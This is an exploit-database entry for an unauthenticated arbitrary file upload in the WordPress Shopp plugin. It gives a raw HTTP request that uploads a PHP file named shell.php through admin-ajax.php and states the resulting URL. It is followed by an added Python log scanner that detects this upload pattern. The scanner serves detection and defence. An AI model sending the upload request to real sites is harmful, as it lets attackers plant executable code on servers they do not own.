## https://sploitus.com/exploit?id=WPEX-ID:DCC7BE04-550B-427A-A14F-A2365D96A00E
https://www.youtube.com/watch?v=Y4dHEk2mWLw

```http
POST /wp-admin/admin-ajax.php?action=shopp_upload_file HTTP/1.1
Accept: application/json
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2167174666627501894262091506
Content-Length: 499
Connection: close

-----------------------------2167174666627501894262091506
Content-Disposition: form-data; name="dzchunkindex"

0
-----------------------------2167174666627501894262091506
Content-Disposition: form-data; name="dztotalchunkcount"

1
-----------------------------2167174666627501894262091506
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php
echo 'Failed';
?>

-----------------------------2167174666627501894262091506--
```


The uploaded file will be at https://example.com/wp-content/uploads/shell.php
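
A defender-side check for the request shown above, as an added example that is not part of the original entry: it scans web server access logs for POSTs to the `shopp_upload_file` AJAX action and for requests for PHP files under `/wp-content/uploads/`, and correlates the two by client IP. It assumes Combined Log Format; the function names are hypothetical and the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format (assumed): ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} '
)
PHP_EXT = (".php", ".phtml", ".phar")

def classify(line):
    """Return (ip, tag, path) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = unquote(url.path)
    # Matches the request on the page, where the action is in the query string.
    # An action sent only in the POST body is not visible in access logs.
    if (m["method"] == "POST" and path.endswith("/wp-admin/admin-ajax.php")
            and "shopp_upload_file" in parse_qs(url.query).get("action", [])):
        return (m["ip"], "shopp_upload", path)
    # Script files are not expected to be served from the uploads tree.
    if "/wp-content/uploads/" in path and path.lower().endswith(PHP_EXT):
        return (m["ip"], "php_in_uploads", path)
    return None

def scan(lines):
    """Return (findings, correlated_ips): every flagged line, plus the IPs that
    used the upload action and later requested PHP from the uploads tree."""
    findings, uploaders, correlated = [], set(), set()
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        findings.append(hit)
        ip, tag, _ = hit
        if tag == "shopp_upload":
            uploaders.add(ip)
        elif ip in uploaders:
            correlated.add(ip)
    return findings, correlated

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=shopp_upload_file HTTP/1.1" 200 31 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Jan/2024:10:00:03 +0000] "GET /wp-content/uploads/shell.php HTTP/1.1" 200 6 "-" "curl/8.0"',
    '198.51.100.4 - - [10/Jan/2024:10:01:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Jan/2024:10:01:05 +0000] "GET /wp-content/uploads/2024/01/logo.png HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]
```

Calling `scan(SAMPLE_LOG)` flags the first two lines and reports `203.0.113.7` as a correlated client; the heartbeat POST and the image request are ignored.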